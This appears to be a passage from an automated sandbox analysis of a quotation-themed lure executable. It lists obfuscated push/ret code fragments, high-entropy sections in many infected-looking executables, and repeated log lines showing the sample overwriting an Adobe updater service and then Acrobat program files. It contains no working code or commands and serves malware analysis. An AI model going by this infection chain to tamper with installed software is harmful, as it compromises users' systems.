Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B07E66h; ret	0_2_00B08057
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0817Ah; ret	0_2_00B0808B
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B082E5h; ret	0_2_00B080D9
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0826Ah; ret	0_2_00B0819E
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0849Ch; ret	0_2_00B081E4
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0805Ch; ret	0_2_00B08255
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08321h; ret	0_2_00B082E0
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B07FBFh; ret	0_2_00B0831F
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B07FA8h; ret	0_2_00B0834C
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B084BAh; ret	0_2_00B083E2
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08426h; ret	0_2_00B084D8
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08075h; ret	0_2_00B084FD
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B0808Ch; ret	0_2_00B08512
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08B6Fh; ret	0_2_00B08596
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B08550 push 00B08E94h; ret	0_2_00B085C9

Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Static PE information: section name: .reloc entropy: 7.920466674151345
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.924221174690993
Source: default-browser-agent.exe.1.dr	Static PE information: section name: .reloc entropy: 7.929499319900758
Source: firefox.exe.1.dr	Static PE information: section name: .reloc entropy: 7.926775462645878
Source: minidump-analyzer.exe.1.dr	Static PE information: section name: .reloc entropy: 7.923119535596675
Source: 117.0.5938.132_chrome_installer.exe.1.dr	Static PE information: section name: .reloc entropy: 7.922527131984518
Source: FXSSVC.exe.1.dr	Static PE information: section name: .reloc entropy: 7.930238486438366
Source: elevation_service.exe.1.dr	Static PE information: section name: .reloc entropy: 7.931944255088249
Source: Aut2exe.exe.1.dr	Static PE information: section name: .rsrc entropy: 7.7963866706821925
Source: elevation_service.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.934055047477224
Source: SensorDataService.exe.1.dr	Static PE information: section name: .reloc entropy: 7.923090539105195
Source: Spectrum.exe.1.dr	Static PE information: section name: .reloc entropy: 7.9334840112577325
Source: AgentService.exe.1.dr	Static PE information: section name: .reloc entropy: 7.924859831824957
Source: vds.exe.1.dr	Static PE information: section name: .reloc entropy: 7.9290296989668185
Source: VSSVC.exe.1.dr	Static PE information: section name: .reloc entropy: 7.927430160921154
Source: wbengine.exe.1.dr	Static PE information: section name: .reloc entropy: 7.929221888085987
Source: wmpnetwk.exe.1.dr	Static PE information: section name: .reloc entropy: 7.934813992480196
Source: SearchIndexer.exe.1.dr	Static PE information: section name: .reloc entropy: 7.933930452166581
Source: 7zFM.exe.1.dr	Static PE information: section name: .reloc entropy: 7.919763146683704
Source: identity_helper.exe.1.dr	Static PE information: section name: .reloc entropy: 7.928608841771513
Source: setup.exe.1.dr	Static PE information: section name: .reloc entropy: 7.932716798674576
Source: msedgewebview2.exe.1.dr	Static PE information: section name: .reloc entropy: 7.924242960753606
Source: msedge_proxy.exe.1.dr	Static PE information: section name: .reloc entropy: 7.930182120217788

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
